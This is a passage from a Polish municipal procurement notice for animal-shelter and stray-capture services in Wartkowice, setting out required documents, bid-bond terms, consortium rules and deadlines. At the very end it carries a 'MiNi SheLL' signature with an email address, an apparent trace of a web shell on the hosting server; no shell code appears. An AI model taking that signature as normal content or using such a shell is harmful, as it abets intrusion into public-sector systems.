p.z.p.,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłat tych należności;<br/>3. zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 p.z.p.,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>4. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>5. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego. Wzór oświadczenia stanowi Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu :<br/>1.1. w zakresie posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej:<br/>1.1.1. statut organizacji społecznej potwierdzający, że jej celem statutowym jest ochrona zwierząt, w<br/>tym m.in. prowadzenie schronisk dla bezdomnych zwierząt oraz zapewnianie ochrony przed<br/>bezdomnymi zwierzętami, oraz że ma ona prawo prowadzić działalność zarobkową - dotyczy wyłącznie<br/>organizacji społecznych;<br/>i/lub<br/>decyzję zezwalającą na prowadzenie działalności w zakresie schroniska dla bezdomnych zwierząt<br/>wydaną przez właściwego miejscowo dla siedziby schroniska Wójta Gminy/ Burmistrza/ Prezydenta<br/>Miasta;<br/>1.1.2. decyzję Powiatowego Lekarza Weterynarii właściwego miejscowo dla Wykonawcy o objęciu<br/>nadzorem inspekcji weterynaryjnej, wprowadzeniu do Rejestru Powiatowego Lekarza Weterynarii i<br/>nadaniu weterynaryjnego numeru identyfikacyjnego;<br/>1.1.3. decyzję zezwalającą na prowadzenie działalności w zakresie prowadzenia działalności w<br/>zakresie ochrony przed bezdomnymi zwierzętami (odławiania) na terenie gminy Wartkowice wydane<br/>przez Wójta – dotyczy przedsiębiorców;<br/>1.1.4. decyzję Powiatowego Lekarza Weterynarii stwierdzającą spełnianie wymagań weterynaryjnych<br/>dla działalności w zakresie transportu zwierząt w związku z prowadzeniem innej działalności<br/>gospodarczej;<br/>1.1.5. aktualne zezwolenie dla przewoźnika zgodne z art.10 ust 1 Rozporządzenia Rady (WE) nr<br/>1/2005 z dnia 22 grudnia 2001r. wydane przez Powiatowego Lekarza Weterynarii właściwego<br/>miejscowo dla Wykonawcy;<br/>1.2. w zakresie sytuacji ekonomicznej lub finansowej:<br/>dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia.<br/>1.3. w zakresie zdolności technicznej lub zawodowej:<br/>1.3.1. wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy. Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 5 do<br/>SWZ.<br/>1.3.2. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; Przedmiotowy wykaz<br/>należy złożyć w formularzu, którego wzór stanowi załącznik nr 9 do SWZ.<br/>1.3.3. wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w<br/>celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi<br/>zasobami. Przedmiotowy wykaz należy złożyć w formularzu, którego wzór stanowi załącznik nr 10 do SWZ.<br/>1.3.4. oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry<br/>kierowniczej wykonawcy wzór stanowi załącznik nr 11 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> NIE DOTYCZY <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ROZDZIAŁ IX SWZ PKT 3. Dokumenty podmiotów zagranicznych:<br/>1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej zamiast dokumentu, o których mowa:<br/>1.1. w pkt. 2.2.2. ROZDZIAŁ IX SWZ – składa zaświadczenie lub inny dokument potwierdzający,<br/>że Wykonawca nie zalega z płaceniem składek na ubezpieczenie społeczne lub zdrowotne;<br/>1.2. w pkt. 2.2.3.ROZDZIAŁ IX SWZ - składa dokument lub dokumenty wystawione w kraju, w<br/>którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie naruszył<br/>obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne,<br/>1.3. w pkt. 2.2.4. ROZDZIAŁ IX SWZ - potwierdzające, że nie otwarto jego likwidacji, nie zgłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej<br/>tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury.<br/>2. Dokumenty o których mowa w pkt. 3.1. ROZDZIAŁ IX SWZ powinny być wystawione nie<br/>wcześniej niż 3 miesiące przed ich złożeniem.<br/>3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 3.1. ROZDZIAŁ IX SWZ, lub gdy dokumenty te nie odnoszą<br/>się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 p.z.p., art. 109 ust 1<br/>pkt 1 p.z.p. zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokument ten powinien być równie wystawiony nie wcześniej niż 3 miesięcy przed jego złożeniem. <br/>4. W przypadku, gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu powołuje się na zasoby podmiotów udostępniających zasoby na zasadach określonych w art. 118 p.z.p., Zamawiający żąda od Wykonawcy przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 2.2. ROZDZIAŁ IX SWZ dotyczących tych podmiotów,<br/>potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>5.	Przed podpisaniem umowy Wykonawca będzie zobowiązany przekazać Zamawiającemu:<br/>5.1. kopię umowy, jeżeli zamówienie będzie realizowane przez Wykonawców wspólnie ubiegających się udzielenie zamówienia (konsorcjum)w terminie umożliwiającym Zamawiającemu zapoznanie się z jej treścią i ocenę zgodności z zapisami niniejszej SWZ,<br/>5.2.	kopię dokumentów poświadczających wykształcenie i kwalifikacje dla osób wskazanych w dokumentach postępowania/ ofercie, do realizacji niniejszego zamówienia:<br/>5.2.1.	dyplom lekarza weterynarii,<br/>5.2.2.	zaświadczenie potwierdzające prawo do wykonywania zawodu lekarza weterynarii wydane przez właściwą Izbę Lekarsko -Weterynaryjną;<br/>5.2.3.	aktualne licencje dla kierowców i osób obsługujących zgodne z art. 17 ust 2 Rozporządzenia Rady (WE) nr 1/2005 z dnia 22 grudnia 2001r.;<br/>5.3.	kopię dokumentów poświadczających spełnianie wymagań dla każdego środka transportu drogowego wskazanego w dokumentach postępowania/ofercie, do realizacji niniejszego zamówienia tj. decyzję Powiatowego Lekarza Weterynarii stwierdzającą spełnienie wymagań weterynaryjnych środka transportu drogowego do używania w transporcie zwierząt domowych;<br/>5.4.	kserokopie dowodów rejestracyjnych środków transportu, o których mowa w pkt. 4.3. – Rozdział XIX SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca wnosi wadium przed upływem terminu składania ofert w wysokości 2500,00 zł (słownie: dwa tysiące pięćset złotych).<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>2.1.	pieniądzu;<br/>2.2.	gwarancjach bankowych; <br/>2.3.	gwarancjach ubezpieczeniowych; <br/>2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2019 r. poz. 310, 836 i 1572). <br/>3.	Wadium wniesione w pieniądzu należy złożyć przelewem bankowym na konto Zamawiającego :<br/>CODE SWIFT: GBWCPLPP<br/>IBAN: PL nr 37 9271 0005 0000 0228 2000 0250<br/>w tytule wpisując: „ZP.271.01.2022 – wadium”.<br/>Za termin wniesienia wadium w formie pieniężnej uznaje się datę uznania środków na koncie Zamawiającego (dzień, godzina).<br/>4.	W przypadku złożenia wadium w innej formie niż pieniężna, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>5.1.	upływu terminu związania ofertą;<br/>5.2.	zawarcia umowy w sprawie zamówienia publicznego; <br/>5.3.	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>6.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy: <br/>6.1.	który wycofał ofertę przed upływem terminu składania ofert; <br/>6.2.	którego oferta została odrzucona; <br/>6.3.	po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>6.4.	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>7.	Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 6, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w rozdziale XXIII SWZ. <br/>8.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. <br/>9.	Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>10.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w okolicznościach wskazanych w art. 98 ust 6 p.z.p.. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wspólne ubieganie się o udzielenie zamówienia (np. konsorcja, spółki cywilne).<br/>1.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.2. W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>1.3.	Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>1.4.	Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej.<br/>1.5.	Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik.<br/>1.6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>1.6.1.	żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale VII. <br/>1.6.2. warunki udziału w postępowaniu określone w Rozdziale VIII winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy występujący wspólnie.<br/>1.7.	Celem wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale VII oraz spełnienia warunków udziału w postępowaniu o których mowa w Rozdziale VIII Wykonawcy składają oświadczania i dokumenty określone w rozdziale IX, w sposób i w trybie tam określonym. <br/>1.8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty podmiotowy środek dowodowy stanowiący oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (zgodnie z art. 117 ust. 4.) – Załącznik Nr 8 do SWZ.<br/>1.9.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców przed przystąpieniem do podpisania umowy o zamówienie publiczne. Termin, na jaki winna być zawarta umowa Wykonawców występujących wspólnie, nie może być krótszy od terminu określonego na wykonanie zamówienia.<br/>1.10.	Umowa regulująca współpracę Wykonawców składających wspólnie ofertę nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym i powinna określać w szczególności:<br/>1.10.1.	podmioty składające ofertę i podpisujące umowę;<br/>1.10.2.	cel gospodarczy, dla którego została zawarta umowa;<br/>1.10.3.	zasady reprezentacji i prowadzenia spraw, w tym wskazania podmiotu odpowiedzialnego za prowadzenie rozliczeń z Zamawiającym (wystawienia faktur);<br/>1.10.4.	oznaczenie czasu trwania umowy (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji zamówienia oraz okres gwarancji jakości i/lub rękojmi);<br/>zakres i wartość usłulg realizowanych przez poszczególnych członków konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy, które zostaną wprowadzone do treści zawieranej umowy zostały zawarte we wzorze umowy, stanowiącym Załącznik nr 4 do SWZ nr ZP.271.01.2022.<br/>2.	Wzór umowy szczegółowo przewiduje i określa warunki zmian postanowień zawartej umowy <br/>w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie 24 miesięcy od dnia <br/>01 marca 2022r. lub do wyczerpania maksymalnego wynagrodzenia brutto za wykonanie zamówienia - w zależności od tego, które ze zdarzeń nastąpi wcześniej.

Creat By MiNi SheLL
Email: jattceo@gmail.com